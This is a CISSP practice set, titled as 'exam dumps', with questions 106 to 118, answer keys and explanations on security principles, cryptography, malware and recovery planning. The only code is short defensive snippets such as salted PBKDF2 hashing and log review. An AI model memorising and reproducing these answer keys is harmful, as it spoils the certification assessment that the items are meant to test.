ISC CISSP Certified Information Systems Security Professional Exam Dumps and Practice Test Questions Set 8 Q106-120

Question 106:

 Which principle limits access rights to the minimum necessary for users to perform their job functions?

A) Need-to-Know
B) Least Privilege
C) Separation of Duties
D) Defense in Depth

Answer: B

Explanation:

The principle of Least Privilege is a foundational security concept in information security and system administration. It dictates that users, programs, and processes should be granted only the permissions necessary to perform their assigned tasks and no more. By applying this principle, organizations minimize the potential for misuse, accidental changes, or exploitation by malicious actors. Unlike Need-to-Know, which limits access to information but does not necessarily limit system-level permissions, Least Privilege ensures that all access rights are tightly controlled. This principle also differs from Separation of Duties, which distributes tasks among multiple users to reduce fraud, and Defense in Depth, which relies on multiple layers of security but is not specifically focused on access restriction.

Implementing Least Privilege involves careful planning, role-based access control, and regular reviews of user permissions. Role-based access control assigns permissions according to job roles rather than individuals, reducing the administrative burden of managing each user separately. Additionally, organizations must ensure that users are not granted unnecessary administrative privileges and that temporary elevated access is closely monitored and removed when no longer required. The reduction of privileges directly limits the attack surface, ensuring that even if an account is compromised, the potential damage is restricted to the permissions of that account.
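
To make the role-based approach concrete, the following minimal Python sketch shows permission checks that default to deny; the role and permission names are hypothetical examples, not a prescribed scheme.

```python
# Minimal illustration of role-based access control (RBAC) supporting
# least privilege: each role carries only the permissions its job needs.
# Role and permission names here are hypothetical examples.

ROLE_PERMISSIONS = {
    "accounts_clerk": {"invoice:read", "invoice:create"},
    "auditor":        {"invoice:read", "audit_log:read"},
    "helpdesk":       {"user:reset_password"},
}

def is_allowed(role: str, permission: str) -> bool:
    """Grant access only if the permission is explicitly in the role's set."""
    return permission in ROLE_PERMISSIONS.get(role, set())

# Default-deny: anything not explicitly granted is refused.
assert is_allowed("auditor", "invoice:read")
assert not is_allowed("auditor", "invoice:create")
```

Because every role starts from an empty set and anything not explicitly granted is refused, adding a permission becomes a deliberate, auditable act rather than a default.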

From a compliance standpoint, adhering to the Least Privilege principle is critical for regulatory frameworks such as GDPR, HIPAA, and PCI DSS, which require controlled access to sensitive information. Least Privilege also strengthens defense against insider threats, a major concern in organizational security, by preventing users from accessing information or systems unrelated to their duties. Furthermore, it is essential in implementing secure software and network architecture because it ensures that processes and applications operate only within their designated permissions, reducing the likelihood of privilege escalation attacks.

In practice, Least Privilege requires continuous monitoring and auditing. Privilege creep, where users accumulate unnecessary permissions over time, must be actively prevented. Automated tools can help by providing alerts when permissions exceed the role requirements. Logging and auditing systems are critical to identify and correct deviations from the principle. Overall, Least Privilege is not just a technical control but a strategic approach to minimizing risk in a security-conscious organization.

The security principle that limits access to the minimum necessary for job functions is therefore Least Privilege, making it the correct answer. Implementing this principle reduces risk, strengthens compliance, and limits potential damage from accidental or malicious actions.

Question 107:

 Which type of cloud service provides customers with fully managed applications without managing the underlying infrastructure?

A) Infrastructure as a Service
B) Platform as a Service
C) Software as a Service
D) Function as a Service

Answer: C

Explanation:

Software as a Service, or SaaS, is a cloud computing model that delivers fully managed software applications over the internet. In the SaaS model, the service provider is responsible for managing the underlying infrastructure, including servers, storage, networking, operating systems, and application updates. This allows organizations and end-users to access applications through web browsers or dedicated clients without having to worry about deployment, maintenance, or technical operations. SaaS stands in contrast to Infrastructure as a Service, which provides virtualized computing resources but requires the customer to manage the operating system and applications, and Platform as a Service, which provides a runtime environment to deploy applications but still involves some level of application management. Function as a Service is another model that allows execution of event-driven code but focuses on small, stateless functions rather than complete applications.

SaaS provides significant benefits in terms of scalability, cost-efficiency, and user accessibility. Customers can quickly provision accounts and use applications without investing in hardware or IT staff. SaaS solutions typically include automatic updates, security patches, and backup management, relieving organizations of operational burdens. Examples include email services like Microsoft 365, customer relationship management systems such as Salesforce, and collaboration tools like Slack or Google Workspace. The SaaS model supports multi-tenancy, where multiple customers share the same infrastructure while maintaining data isolation, which helps optimize resource utilization.

From a security perspective, SaaS providers implement access controls, encryption, and monitoring to protect user data. Security responsibilities are shared, with the provider ensuring platform security and the customer managing account-level controls, such as strong passwords and access permissions. SaaS also supports remote work environments by allowing employees to access applications from anywhere, increasing flexibility and productivity while minimizing infrastructure management requirements. Organizations adopting SaaS can focus on business outcomes rather than technical upkeep, allowing IT teams to concentrate on strategic initiatives instead of routine maintenance.

The cloud model delivering fully managed applications without requiring customers to manage the infrastructure is Software as a Service, making it the correct answer. SaaS continues to grow in popularity due to its convenience, flexibility, and reduced operational overhead.

Question 108:

 Which cryptographic attack uses precomputed hash-value pairs to reverse hashed passwords efficiently?

A) Brute-Force Attack
B) Rainbow Table Attack
C) Man-in-the-Middle Attack
D) Replay Attack

Answer: B

Explanation:

A Rainbow Table Attack is a cryptographic attack that uses precomputed tables of hash-value pairs to efficiently reverse hashed passwords. Unlike a brute-force attack, which systematically attempts all possible combinations of characters, a rainbow table leverages precomputed hashes to quickly find the original plaintext corresponding to a given hash. This dramatically reduces the time required to crack passwords, especially those that are unsalted and commonly used. Rainbow tables are particularly effective against systems that store passwords in hash form without additional security measures, such as salting. Salting involves appending unique random data to each password before hashing, which ensures that identical passwords generate different hash outputs and renders rainbow tables ineffective.

The concept behind rainbow tables involves precomputing hashes for a very large set of candidate passwords; in practice, the tables store compressed chains of hashes linked by reduction functions, a time-memory trade-off that avoids storing every plaintext-hash pair explicitly. When an attacker captures a hashed password from a compromised system, they can search the precomputed table for a match. If a match is found, the original password is revealed immediately. This attack highlights the importance of secure password storage practices, including using strong, unique passwords and cryptographic hashing algorithms with salting mechanisms. Modern best practices also include key stretching techniques, such as PBKDF2, bcrypt, or Argon2, which deliberately slow down hash computation and make large-scale precomputation impractical.
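
As an illustration of salting combined with key stretching, the sketch below uses Python's standard-library PBKDF2; the iteration count is an arbitrary example and should follow current guidance in practice.

```python
import hashlib
import hmac
import os

# Illustrative salted, stretched password hashing with PBKDF2.
# The iteration count (600,000) is an example value, not a recommendation.

def hash_password(password: str) -> tuple[bytes, bytes]:
    salt = os.urandom(16)  # unique random salt per password
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return salt, digest    # store both next to the account record

def verify_password(password: str, salt: bytes, stored: bytes) -> bool:
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 600_000)
    return hmac.compare_digest(candidate, stored)
```

Because each account carries its own random salt, two users with the same password store different digests, and a table precomputed without the salt matches nothing.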

Rainbow table attacks differ significantly from Man-in-the-Middle attacks, which intercept communication, and Replay attacks, which reuse captured messages. They are also distinct from brute-force attacks, which compute each guess at attack time. Because the tables mapping candidate plaintexts to hash outputs are built in advance, an attacker can reverse a captured hash by simple lookup rather than by hashing every candidate in real time, which is what makes the technique so much faster than brute force, especially against weak or commonly used passwords.

The effectiveness of rainbow tables is contingent upon the lack of additional protective measures, chiefly password salting. Because the same password combined with a different salt produces a completely different hash output, salting invalidates precomputed tables outright: a table built without the salt matches nothing. Organizations should pair salting with collision-resistant hash functions such as SHA-256 and, for password storage in particular, deliberately slow algorithms such as bcrypt, which raise the cost of computing each guess and further increase attack difficulty.

Rainbow table attacks exploit the deterministic nature of hash functions. Without additional defenses, any identical password will always produce the same hash, making it a prime target for attackers using these precomputed datasets. Users who reuse passwords across multiple accounts increase their risk exponentially, as one compromised hash can lead to widespread account compromises. Implementing multi-factor authentication adds a layer of defense because, even if a password is revealed through a rainbow table attack, access still requires a second authentication factor, such as a hardware token, biometric verification, or one-time password.

Other mitigation strategies include enforcing strong password policies, requiring long and complex passwords with mixed characters, numbers, and symbols, and mandating regular password changes. Password managers can help users maintain unique, high-entropy passwords without the burden of memorization. Additionally, organizations should monitor for signs of credential compromise, such as unusual login attempts or access patterns, and employ intrusion detection systems to detect unauthorized access attempts that may result from rainbow table attacks.

Overall, the cryptographic attack that efficiently reverses hashed passwords using precomputed hash-value pairs is the Rainbow Table Attack, making it the correct answer. Understanding this attack underscores the importance of robust password storage practices, salting, hashing, multi-factor authentication, and user education. By combining these defensive measures, organizations can significantly reduce the likelihood and impact of successful rainbow table attacks, strengthening their overall cybersecurity posture. Awareness and proactive mitigation are key because, without proper safeguards, even sophisticated hashing mechanisms can become vulnerable to this highly optimized form of password attack.

Question 109:

 Which process ensures a system can be restored quickly after a disaster or outage?

A) Business Continuity Planning
B) Disaster Recovery Planning
C) Risk Assessment
D) Incident Response

Answer: B

Explanation:

Disaster Recovery Planning (DRP) is the structured process focused on restoring IT systems, applications, and data after a disaster or major outage. While Business Continuity Planning ensures that critical operations continue during disruptions, DRP specifically addresses how technology infrastructure is recovered to minimize downtime and data loss. DRP identifies recovery strategies, prioritizes critical systems, and defines recovery objectives such as Recovery Time Objective (RTO) and Recovery Point Objective (RPO). It also includes provisions for backup procedures, alternate sites, hardware redundancy, and software recovery to ensure that business-critical operations resume as quickly as possible.
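
A simple way to see how RTO and RPO drive planning is the hedged sketch below; the objective values are hypothetical and would in practice come from a business impact analysis.

```python
from datetime import datetime, timedelta

# Illustrative check of recovery objectives defined in a DRP.
# These values are hypothetical; real RTO/RPO come from business impact analysis.
RPO = timedelta(hours=4)   # maximum tolerable data loss
RTO = timedelta(hours=2)   # maximum tolerable restoration time

def rpo_met(last_backup: datetime, failure_time: datetime) -> bool:
    """Data loss equals the gap between the failure and the last good backup."""
    return failure_time - last_backup <= RPO

def rto_met(restore_started: datetime, restore_finished: datetime) -> bool:
    """Downtime equals the time taken to bring systems back online."""
    return restore_finished - restore_started <= RTO
```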

A robust DRP includes preparation, testing, and continuous improvement. Preparation involves identifying potential risks, critical systems, and dependencies. Testing ensures that recovery strategies work effectively under real conditions. Regular updates to the DRP account for changes in the IT environment, new technologies, and evolving threats. Disaster Recovery Planning is critical for organizational resilience, especially in sectors where system downtime can result in financial loss, reputational damage, or regulatory non-compliance, such as banking, healthcare, and e-commerce. DRP also aligns with cybersecurity strategies by mitigating the effects of ransomware, hardware failures, or accidental data deletion.

Incident Response focuses on handling active security incidents, while Risk Assessment identifies potential threats but does not provide structured recovery procedures. Disaster Recovery Planning, by contrast, establishes the framework to restore full functionality efficiently, allowing the organization to maintain operational continuity and service delivery.

The process that ensures rapid system restoration after disruptions is therefore Disaster Recovery Planning, making it the correct answer. A well-implemented DRP reduces downtime, limits operational impact, and supports overall business resilience.

Question 110:

 Which type of social engineering attack convinces users to reveal confidential information via fake communications?

A) Tailgating
B) Phishing
C) Shoulder Surfing
D) Dumpster Diving

Answer: B

Explanation:

Phishing is a social engineering attack that manipulates individuals into revealing sensitive information through deceptive communications such as emails, text messages, or fake websites. Unlike Tailgating, which exploits physical access, Shoulder Surfing, which observes confidential information directly, or Dumpster Diving, which recovers discarded sensitive materials, phishing targets the human element by exploiting trust, curiosity, fear, or urgency. Phishing attacks often impersonate trusted entities such as banks, employers, or service providers, crafting messages that appear legitimate and prompt immediate action.

Successful phishing attacks can result in credential theft, financial loss, or unauthorized access to systems. Advanced phishing techniques, such as spear-phishing or whaling, target specific individuals or high-profile executives, increasing the likelihood of success. Mitigating phishing risks involves a combination of technical and procedural controls. Technical measures include email filters, spam detection, secure web gateways, and multi-factor authentication. Procedural measures focus on user education and awareness, teaching individuals to recognize suspicious emails, verify sender authenticity, and avoid sharing confidential information without proper validation. Organizations often conduct simulated phishing campaigns to train employees and assess the effectiveness of awareness programs.
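
As one small example of a technical control, the following naive Python sketch flags sender domains that closely resemble, but do not match, a trusted domain; the domain list and distance threshold are illustrative assumptions, and real email filters combine many stronger signals.

```python
# Naive illustration of one layer of technical phishing defense: flag
# messages whose sender domain merely resembles a trusted domain.
# The domain list and the distance threshold are hypothetical.

TRUSTED_DOMAINS = {"example-bank.com", "example-corp.com"}

def edit_distance(a: str, b: str) -> int:
    """Classic Levenshtein distance via dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[-1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def looks_like_spoof(sender_domain: str) -> bool:
    if sender_domain in TRUSTED_DOMAINS:
        return False
    # e.g. "examp1e-bank.com" sits one edit away from the real domain
    return any(edit_distance(sender_domain, d) <= 2 for d in TRUSTED_DOMAINS)
```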

Phishing remains one of the leading causes of data breaches globally because it targets human behavior rather than system vulnerabilities. Attackers exploit trust, curiosity, urgency, or fear to manipulate users into disclosing sensitive information such as login credentials, personal identification numbers, or financial data. Phishing campaigns can take many forms, including deceptive emails, fraudulent websites, instant messages, or even phone calls that appear legitimate. Because these attacks exploit psychological tendencies, they are often highly effective even against well-protected technical environments.

A successful defense against phishing requires a multi-layered approach combining technological safeguards, organizational policies, and user awareness. Email filtering and spam detection systems help identify and block malicious messages before they reach users, but these tools cannot eliminate risk. Security-conscious organizational culture is crucial, emphasizing the importance of verifying sources, recognizing red flags, and reporting suspicious activity promptly. Continuous security training and simulated phishing exercises are effective ways to educate employees and test their awareness in realistic scenarios. Over time, these measures cultivate a workforce that is vigilant and capable of identifying phishing attempts before sensitive information is disclosed.

Technical defenses against phishing include multi-factor authentication, which ensures that even if credentials are compromised, additional verification is required for account access. Web browser protections and security certificates can also help users distinguish between legitimate and fraudulent sites. Organizations may implement policies requiring secure password practices, unique credentials per account, and immediate reporting protocols for suspected compromises. Monitoring for unusual account activity provides an additional layer of detection, allowing security teams to respond quickly to potential phishing incidents.

Phishing is not limited to corporate environments; individuals face similar risks through personal email, social media, and mobile messaging platforms. Attackers often craft messages tailored to the recipient, making them appear authentic and highly convincing. Tailored spear-phishing campaigns against specific individuals or departments increase the likelihood of success, and Business Email Compromise (BEC) attacks exploit organizational hierarchies to authorize fraudulent transactions, showing that phishing can have severe financial and reputational consequences.

The social engineering attack that tricks users into revealing confidential information is therefore phishing, making it the correct answer. Understanding phishing highlights the interplay between human factors and cybersecurity, demonstrating that even robust technical controls can be circumvented by manipulative tactics. Effective mitigation reduces exposure to cyber threats, financial loss, and data compromise, reinforcing the need for continuous vigilance, comprehensive training programs, and layered security measures. By combining technological safeguards with human awareness, organizations and individuals can significantly reduce the risk posed by phishing attacks, ensuring stronger overall resilience against cybercrime.

Question 111:

 Which disaster recovery site has all hardware and software ready for immediate use?

A) Cold Site
B) Warm Site
C) Hot Site
D) Backup Site

Answer: C

Explanation:

A Hot Site is a disaster recovery facility that is fully equipped with hardware, software, network connectivity, and data backup, ready for immediate operation. It contrasts with Cold Sites, which provide only space and utilities, and Warm Sites, which provide partial infrastructure requiring setup before operations can resume. Backup Sites focus primarily on storing data and may not include operational hardware or network infrastructure.

Hot Sites are crucial for organizations requiring minimal downtime and uninterrupted service delivery, such as financial institutions, healthcare providers, or e-commerce platforms. They support critical applications, provide real-time or near-real-time data replication, and allow employees to continue operations with little to no disruption. Hot Sites are expensive to maintain due to the continuous need for updated infrastructure, replication of production systems, and regular testing to ensure readiness.

The advantage of a Hot Site lies in its ability to ensure high availability and business continuity during disasters, such as natural events, hardware failures, cyberattacks, or power outages. Testing and regular maintenance are required to guarantee that the Hot Site mirrors production systems and can handle operational loads. Hot Sites are often part of a broader disaster recovery strategy, working alongside Backup Sites and Cold/Warm Sites to provide layered protection.

The disaster recovery site that is ready for immediate operations is therefore a Hot Site, making it the correct answer. Its implementation ensures organizations can sustain operations without significant disruption, protecting revenue, customer trust, and regulatory compliance.

Question 112:

 Which security control type identifies incidents after they occur?

A) Preventive
B) Detective
C) Corrective
D) Deterrent

Answer: B

Explanation:

Detective controls are security mechanisms designed to identify and report incidents after they occur. Unlike preventive controls, which aim to stop incidents before they happen, or corrective controls, which restore systems after incidents, detective controls provide monitoring, alerting, and auditing capabilities that allow organizations to detect suspicious activity, policy violations, or security breaches. Examples of detective controls include intrusion detection systems (IDS), security information and event management (SIEM) solutions, audit logs, monitoring tools, and anomaly detection systems.

Detective controls play a critical role in an organization’s security posture by providing visibility into ongoing operations and enabling a timely response to incidents. They allow security teams to analyze patterns, investigate events, and identify potential breaches or misuse of systems. Detective controls also support compliance with regulatory requirements by maintaining records of security events and providing evidence for audits or investigations.

While detective controls do not prevent incidents directly, they complement preventive and corrective measures by ensuring that incidents are noticed and addressed promptly. The implementation of detective controls involves defining monitoring criteria, establishing alerting thresholds, and ensuring that logs and alerts are regularly reviewed. Automated solutions can assist by correlating events, detecting anomalies, and reducing response times.
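
The sketch below illustrates the idea of an alerting threshold over audit logs; the log format and the threshold value are assumptions made for the example, not a standard.

```python
from collections import Counter

# Sketch of a simple detective control: review authentication logs and
# alert when failed logins from one source exceed a threshold.
FAILED_LOGIN_THRESHOLD = 5

def review_auth_log(lines: list[str]) -> list[str]:
    """Return source addresses whose failure count crosses the threshold."""
    failures = Counter()
    for line in lines:
        # Assumed format: "<timestamp> FAIL <username> <source_ip>"
        parts = line.split()
        if len(parts) == 4 and parts[1] == "FAIL":
            failures[parts[3]] += 1
    return [ip for ip, n in failures.items() if n >= FAILED_LOGIN_THRESHOLD]
```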

The control type designed to identify incidents post-occurrence is therefore Detective, making it the correct answer. Effective use of detective controls strengthens an organization’s security posture, enables proactive response, and ensures accountability and compliance.

Question 113:

 Which malware type hides its presence and maintains privileged access on a system?

A) Virus
B) Trojan
C) Worm
D) Rootkit

Answer: D

Explanation:

A Rootkit is a sophisticated type of malware specifically designed to conceal its presence while providing attackers with persistent, privileged access to an infected system. Unlike viruses, which attach to files and execute when the host file runs, or worms, which self-replicate and spread across networks without user intervention, rootkits operate stealthily and at a low system level, often integrating with the operating system’s kernel or bootloader. This enables them to evade conventional antivirus and security detection mechanisms, making them exceptionally difficult to identify and remove. Trojans, on the other hand, rely on deception to trick users into executing them, but do not inherently hide themselves in the same persistent and privileged manner as rootkits.

Rootkits compromise system integrity by intercepting and modifying standard operating system calls, hiding processes, files, or network connections associated with malicious activities. This concealment allows attackers to deploy additional malware, steal sensitive information, manipulate system operations, or maintain backdoor access without triggering alerts. Kernel-level rootkits are particularly dangerous because they operate at the core of the operating system, granting complete control over system resources. User-mode rootkits, while slightly less sophisticated, can still manipulate applications and system utilities to obscure their presence. The persistence and stealth of rootkits make them a significant threat in enterprise and personal computing environments.

Detection and removal of rootkits typically require advanced forensic techniques. Since they can bypass standard security tools, identifying a rootkit often involves analyzing system behavior for anomalies, using specialized scanning software, or performing offline analysis from a clean environment. In severe cases, the only guaranteed method of removal may involve fully reformatting the system and reinstalling the operating system to ensure all traces of the rootkit are eradicated.

Rootkits highlight the critical importance of proactive security measures, including continuous monitoring, system hardening, software patching, and user education. Network segmentation and least privilege access policies can help limit the spread and impact of rootkits if they do manage to infiltrate a system. Additionally, behavioral monitoring solutions and integrity verification mechanisms can identify unusual patterns in system files or processes that may indicate rootkit activity.
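
The following sketch shows the integrity-verification idea in miniature: compare current file hashes against a previously recorded baseline. A real tool would also protect the baseline and run from a trusted environment, since a kernel-level rootkit can subvert checks performed on the infected host.

```python
import hashlib
from pathlib import Path

# Sketch of integrity verification: detect files whose contents no
# longer match a trusted baseline of SHA-256 digests.

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def detect_changes(baseline: dict[str, str]) -> list[str]:
    """Return paths whose current hash differs from the recorded baseline."""
    return [p for p, digest in baseline.items()
            if not Path(p).exists() or sha256_of(Path(p)) != digest]
```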

The malware type that hides itself and maintains privileged access is therefore the Rootkit, making it the correct answer. Understanding rootkits is essential for cybersecurity professionals, as they represent one of the most insidious forms of malware due to their ability to evade detection, maintain control, and facilitate subsequent attacks.

Question 114:

 Which cryptographic method ensures the integrity of a message?

A) Symmetric Encryption
B) Digital Signature
C) Hashing
D) Asymmetric Encryption

Answer: C

Explanation:

Hashing is a cryptographic method designed to ensure the integrity of data by producing a fixed-length digest from an input message. The key characteristic of a hash function is that any change in the input, even a single character, produces a significantly different hash output. This property allows users and systems to detect alterations or tampering with data. Unlike symmetric or asymmetric encryption, which primarily focus on confidentiality by transforming data into unreadable formats for unauthorized users, hashing focuses on verifying that the message or data has not been modified during transmission or storage. Digital signatures also ensure integrity and authenticity, but they rely on underlying hash functions to create the digest before signing, meaning hashing is the fundamental mechanism for integrity verification.

Hash functions are widely used in a variety of applications beyond cryptography. They are employed in password storage, where hashed passwords are stored instead of plaintext to reduce the risk of exposure. Hashing is also used in data verification, where the hash of transmitted files is compared against the original to confirm that no alterations occurred. Algorithms like SHA-256, SHA-3, and BLAKE2 are considered secure because they are resistant to collisions, meaning it is computationally infeasible to find two different inputs that produce the same hash output.
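
The avalanche property described above is easy to demonstrate: changing a single character of the input yields an unrelated SHA-256 digest.

```python
import hashlib

# One changed character produces a completely different digest, which is
# what makes tampering detectable by recomputing and comparing hashes.
print(hashlib.sha256(b"transfer $100 to Alice").hexdigest())
print(hashlib.sha256(b"transfer $900 to Alice").hexdigest())
```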

Hashing is an essential element in maintaining the integrity of digital communications. For example, in software distribution, a hash value can be published alongside the software package. Users can generate a hash of the downloaded package and compare it to the provided hash value. If the two hashes match, the file is considered intact; any mismatch indicates potential tampering. This method ensures that the integrity of the software has not been compromised by malware or corruption during download.
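
A hedged sketch of that verification step, with a placeholder for the published digest:

```python
import hashlib

# Recompute the hash of a downloaded file and compare it to the value
# published by the distributor. The path and digest are placeholders.

def verify_download(path: str, expected_sha256: str) -> bool:
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest() == expected_sha256
```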

While encryption transforms the content to maintain confidentiality, hashing creates a unique fingerprint to detect unauthorized changes. Even highly secure encryption, used on its own, cannot detect whether the ciphertext has been altered; this is why integrity checks rely on hashing. Combining hashing with digital signatures or message authentication codes further strengthens security by verifying both authenticity and integrity.

The cryptographic method that ensures message integrity is therefore hashing, making it the correct answer. Hashing is a cornerstone of secure communication, data validation, and system trust, forming the basis of many security protocols and practices in modern computing.

Question 115:

 Which risk response strategy involves accepting a risk without taking action to mitigate it?

A) Mitigation
B) Acceptance
C) Transfer
D) Avoidance

Answer: B

Explanation:

Risk Acceptance is a strategy where an organization acknowledges a particular risk but chooses to tolerate it without taking any proactive measures to reduce its likelihood or impact. This approach is generally applied when the risk is minor, the probability of occurrence is low, or the cost of mitigation exceeds the potential loss. Unlike Mitigation, which actively reduces risk through technical, procedural, or operational measures, or Transfer, which shifts the responsibility of risk to a third party such as an insurer, Acceptance involves no immediate action. Avoidance, by contrast, eliminates risk by changing or discontinuing the associated activity.

Accepting a risk does not mean ignoring it. Organizations employing this strategy monitor the risk closely and prepare contingency plans should it materialize. Risk acceptance is a calculated decision, often based on cost-benefit analysis, risk prioritization, and strategic considerations. For instance, a company may accept the risk of minor downtime in a non-critical application rather than investing significant resources to prevent it, focusing instead on critical systems that directly impact revenue or customer satisfaction.
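
The cost-benefit reasoning behind acceptance can be expressed with the standard annualized loss expectancy formula (ALE = SLE × ARO); the figures below are hypothetical.

```python
# Illustrative cost-benefit test behind a risk-acceptance decision.
# All figures are hypothetical.

def annualized_loss(sle: float, aro: float) -> float:
    """Single loss expectancy times annual rate of occurrence."""
    return sle * aro

ale = annualized_loss(sle=5_000, aro=0.2)  # expect $1,000/year in losses
control_cost = 8_000                        # annual cost of the mitigation

# When the control costs more than the expected loss, accepting (and
# monitoring) the risk can be the rational choice.
accept_risk = control_cost > ale
print(f"ALE=${ale:,.0f}, control=${control_cost:,.0f}, accept={accept_risk}")
```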

Risk acceptance is an integral part of comprehensive risk management frameworks. It allows organizations to allocate resources efficiently by concentrating efforts on mitigating high-priority threats. Documenting accepted risks is essential for accountability and audit purposes, providing a clear rationale for why no action was taken and demonstrating awareness of potential impacts. Additionally, acceptance often coexists with monitoring strategies, where the organization continuously evaluates the environment and adjusts its approach if risk conditions change.

By acknowledging risks rather than attempting to eliminate every threat, organizations can achieve a balanced approach to security, operational efficiency, and resource allocation. Risk acceptance is particularly relevant in dynamic environments where threats evolve rapidly, and mitigation may not always be cost-effective or technically feasible.

The risk response strategy that tolerates a risk without immediate action is therefore Acceptance, making it the correct answer. Risk acceptance is a practical, calculated, and strategic approach that complements other risk management strategies, ensuring organizations focus on critical threats while maintaining operational efficiency.

Question 116:

 Which security design principle states that a system should include multiple layers of defense?

A) Least Privilege
B) Open Design
C) Defense in Depth
D) Separation of Duties

Answer: C

Explanation:

Defense in Depth is a core security principle advocating the implementation of multiple layers of defense to protect information systems. The idea is to create overlapping security controls, both technical and administrative, so that if one layer fails, others continue to provide protection. This approach enhances the overall security posture of an organization by mitigating single points of failure and increasing the effort required by an attacker to compromise the system. Defense in Depth is distinct from other principles: Least Privilege focuses on minimizing access rights, Open Design emphasizes security that does not rely on secrecy, and Separation of Duties reduces fraud by distributing responsibilities.

In practice, Defense in Depth involves integrating physical security, technical controls, and administrative policies. Physical controls might include locks, surveillance cameras, and access badges. Technical measures encompass firewalls, intrusion detection systems, antivirus software, network segmentation, encryption, and secure configurations. Administrative controls cover policies, procedures, awareness training, and incident response plans. By layering these controls, organizations can create a comprehensive defense strategy that addresses both external and internal threats.

The layered approach provides redundancy. For example, if a firewall is bypassed, intrusion detection systems can alert administrators to suspicious activity. If malware infects an endpoint, antivirus software, network monitoring, and access controls collectively limit damage. Defense in Depth also promotes resilience by considering multiple threat vectors, including social engineering, insider threats, technical exploits, and environmental hazards.
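
Conceptually, the layering can be pictured as a request that must pass every independent control, as in the sketch below; the control names and logic are purely illustrative.

```python
# Conceptual sketch of defense in depth: a request is admitted only if
# every independent layer approves it, so one bypassed control does not
# equal a breach. Controls here are hypothetical stand-ins.

def firewall_allows(req: dict) -> bool:
    return req.get("port") == 443

def ids_clean(req: dict) -> bool:
    return "attack-signature" not in req.get("payload", "")

def acl_permits(req: dict) -> bool:
    return req.get("user") in {"alice", "bob"}

LAYERS = [firewall_allows, ids_clean, acl_permits]

def admit(req: dict) -> bool:
    return all(layer(req) for layer in LAYERS)

print(admit({"port": 443, "payload": "GET /", "user": "alice"}))  # True
```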

Implementing Defense in Depth requires careful planning, risk assessment, and continuous evaluation. Organizations must identify critical assets, prioritize security investments, and ensure that overlapping layers complement rather than interfere with each other. Regular testing, audits, and incident simulations help validate the effectiveness of the layers and identify weaknesses.

The security principle emphasizing multiple defensive layers is therefore Defense in Depth, making it the correct answer. It provides a holistic approach to security, reduces single points of failure, and strengthens overall organizational resilience against a broad spectrum of threats.

Question 117:

 Which type of backup copies all data and resets the archive bit?

A) Full Backup
B) Differential Backup
C) Incremental Backup
D) Synthetic Full Backup

Answer: A

Explanation:

A Full Backup is a type of data backup in which all files and directories are copied in their entirety from a source system to a storage medium. One defining characteristic of a Full Backup is that it resets the archive bit of each file after the backup is completed. The archive bit is a file attribute that indicates whether a file has been modified since the last backup. Resetting it ensures that subsequent backups, such as incremental or differential, can correctly identify files that have changed and need to be backed up again. Full backups provide a complete snapshot of the system at a specific point in time, making them critical for disaster recovery scenarios.

Differential backups only copy files that have changed since the last full backup and do not reset the archive bit, while incremental backups copy only files that have changed since the last backup of any type and reset the archive bit. Synthetic Full Backups combine previous backups to create a full backup without reading all original files again, reducing storage and processing time, but the resulting backup depends on the previous backup history rather than originating from all files at once.
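
The archive-bit behavior of the three traditional backup types can be simulated in a few lines; the file set here is a toy example.

```python
# Toy simulation of archive-bit handling. True means "modified since the
# last backup" (archive bit set); each backup type differs in which files
# it copies and whether it clears the bit.

def full_backup(fs: dict) -> list:
    copied = list(fs)            # copy every file...
    for name in fs:
        fs[name] = False         # ...and clear every archive bit
    return copied

def incremental_backup(fs: dict) -> list:
    copied = [n for n, bit in fs.items() if bit]  # changed files only
    for name in copied:
        fs[name] = False                          # clears the bit
    return copied

def differential_backup(fs: dict) -> list:
    return [n for n, bit in fs.items() if bit]    # leaves the bit set

files = {"a.doc": True, "b.xls": True, "c.txt": False}
print(full_backup(files))  # copies all three; every bit is now cleared
```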

Full Backups are essential for ensuring comprehensive data protection. They simplify recovery because a single backup contains all the necessary files, eliminating the need to restore multiple incremental or differential backups sequentially. However, Full Backups require more storage space and time compared to incremental or differential backups. Organizations often use a combination of backup strategies: Full Backups on a regular schedule, with incremental or differential backups performed more frequently to reduce storage and backup windows while maintaining recovery capabilities.

The backup type that copies all data and resets the archive bit is therefore a Full Backup, making it the correct answer. Full Backups form the cornerstone of any reliable data protection strategy, ensuring completeness and simplifying restoration.

Question 118:

 Which type of malware replicates by attaching itself to executable files?

A) Worm
B) Virus
C) Trojan
D) Spyware

Answer: B

Explanation:

A Virus is a type of malware specifically designed to replicate by attaching itself to executable files, documents, or other code. Unlike worms, which propagate independently over networks, or trojans, which rely on social engineering for execution, viruses require user interaction to activate and spread. Spyware, in contrast, focuses on gathering information without replication. Viruses often exploit the fact that users may unknowingly execute infected files, enabling the virus to embed itself into other files and systems. This replication mechanism allows viruses to spread gradually, sometimes across networks, removable media, or shared storage, causing widespread damage or disruption.

The behavior of a virus typically involves three stages: infection, activation, and replication. During infection, the virus embeds itself into a host file or application. Once the host is executed, the virus becomes active, executing its malicious payload. Depending on the type of virus, the payload may perform harmful actions such as corrupting data, stealing sensitive information, or installing additional malware. Finally, replication occurs when the virus attaches itself to other executable files or spreads through networks, emails, or shared drives. Some sophisticated viruses include polymorphic or metamorphic code that changes with each infection to evade detection by antivirus software.

Virus prevention relies heavily on user education, up-to-date antivirus software, and secure coding practices. Users should avoid opening unknown attachments, downloading files from untrusted sources, or executing software from questionable origins. Organizations implement endpoint protection, firewalls, and email filtering to limit virus spread and detect infections early. Additionally, regular patching and system updates reduce vulnerabilities that viruses can exploit to gain a foothold on systems.

Understanding the behavior of viruses is critical for both cybersecurity professionals and everyday users. Unlike worms that self-replicate automatically, viruses require a vector, which often involves human actions. This makes awareness and training key components in preventing viral infections. Combined with robust detection tools, backups, and incident response plans, organizations can minimize the impact of virus infections and recover effectively if they occur.

